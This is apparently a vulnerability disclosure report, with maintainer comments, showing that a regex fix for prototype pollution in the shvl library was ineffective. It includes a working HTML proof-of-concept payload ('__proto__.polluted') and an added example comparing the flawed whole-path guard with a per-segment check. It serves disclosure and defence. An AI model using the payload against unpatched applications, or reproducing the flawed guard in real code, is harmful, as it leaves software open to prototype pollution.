Prototype Pollution in robinvdvleuten/shvl

Valid

Reported on

May 30th 2021


✍️ Description

Hi, I've seen a recent prototype pollution report against this library and, while reviewing the code, found that the applied fix does not work at all. The problem lies in the regex used by the fix, as I show below.

🕵️‍♂️ Proof of Concept

The reported prototype pollution resulted in the addition of the following regex to the source code:

!/^(__proto__|constructor|prototype)$/.test(path)

This only rejects a path that consists of exactly the word __proto__, constructor or prototype. To pollute the prototype, however, the caller has to name the attribute to be set, e.g. __proto__.polluted, and because the regex is anchored with ^ and $ it never matches such a path. The fix therefore fails and shvl remains vulnerable to prototype pollution; the payload from the previous report still works as reported. This is my PoC:

<!DOCTYPE html>
<html lang="en">
  <head>
    <title>poc</title>
    <!-- UMD build exposes a global `shvl` -->
    <script src="https://unpkg.com/shvl@latest/dist/shvl.umd.js"></script>
  </head>
  <body>
    <script>
      var quote = {};
      var o = {};
      // The path passes the whole-string regex check because it is not
      // exactly "__proto__"; shvl then walks into Object.prototype and
      // assigns "polluted" on it.
      shvl.set(quote, "__proto__.polluted", "oi");

      // `o` never had "polluted" set directly; seeing it proves the
      // shared prototype was modified.
      if (o.polluted)
        console.log("is polluted!");
      else
        console.log("is safe!");
    </script>
  </body>
</html>
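To make the guard failure concrete outside a browser, here is an added example (not shvl's code and not part of the original report): a minimal path setter modelled on the behaviour the report describes, run once with the whole-path regex from the rejected fix and once with a per-segment check. The setter, the guard names and the `pollutionTest` helper are assumptions introduced for illustration only.

```javascript
// Added example, not shvl's implementation: a minimal path setter modelled on
// the behaviour described in the report (split the path on ".", walk or create
// intermediate objects, assign the leaf). The two guards stand in for the
// rejected fix (whole-path regex) and a per-segment check.
const BLOCKED = /^(__proto__|constructor|prototype)$/;

// Guard as applied in the rejected fix: anchored to the entire path string,
// so "__proto__.polluted" is NOT matched and passes.
function guardWholePath(path) {
  return !BLOCKED.test(path);
}

// Per-segment guard: every key on the path is tested on its own, so
// "__proto__.polluted" is rejected because its first segment matches.
function guardEachSegment(path) {
  return path.split('.').every((key) => !BLOCKED.test(key));
}

// Generic setter. Returns true if it wrote, false if the guard rejected the path.
function set(obj, path, value, guard) {
  if (!guard(path)) return false;
  const keys = path.split('.');
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    // "__proto__" on a plain object resolves to Object.prototype here, which is
    // exactly how the walk escapes the target object.
    if (typeof cur[keys[i]] !== 'object' || cur[keys[i]] === null) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return true;
}

// Hypothetical helper: run a guarded set on a fresh object, then check whether
// an unrelated fresh object sees the property (i.e. Object.prototype changed).
// The side effect is undone afterwards so it does not leak into the process.
function pollutionTest(guard, path = '__proto__.polluted') {
  const victim = {};
  const wrote = set({}, path, 'oi', guard);
  const polluted = victim.polluted === 'oi';
  delete Object.prototype.polluted;
  return { wrote, polluted };
}

console.log('whole-path regex :', pollutionTest(guardWholePath));
console.log('per-segment check:', pollutionTest(guardEachSegment));
```

The first call writes through to `Object.prototype` and the unrelated `victim` object reports `polluted: true`; the second refuses the path before any write happens. The point is that a prototype-pollution guard must inspect every key the setter will traverse, not the path string as a whole.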

💥 Impact

The impact of this vulnerability is that this library, and every application that uses it, remains vulnerable to prototype pollution, as demonstrated by the pwn2win 2021 challenge small-talk.

Matheus Vrech
2 years ago

Researcher


I've already proposed a solution btw https://github.com/robinvdvleuten/shvl/pull/36

Matheus Vrech
a year ago

Researcher


They merged my fix, the vulnerability no longer exists

Matheus Vrech
a year ago

Researcher


@admin

Pavlos validated this vulnerability a year ago
Matheus Vrech has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 3.0.0 with commit 85b59f a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
index.js#L8 has been validated
Pavlos published this vulnerability a year ago
Pavlos
a year ago

Admin


Good job @vrechson!
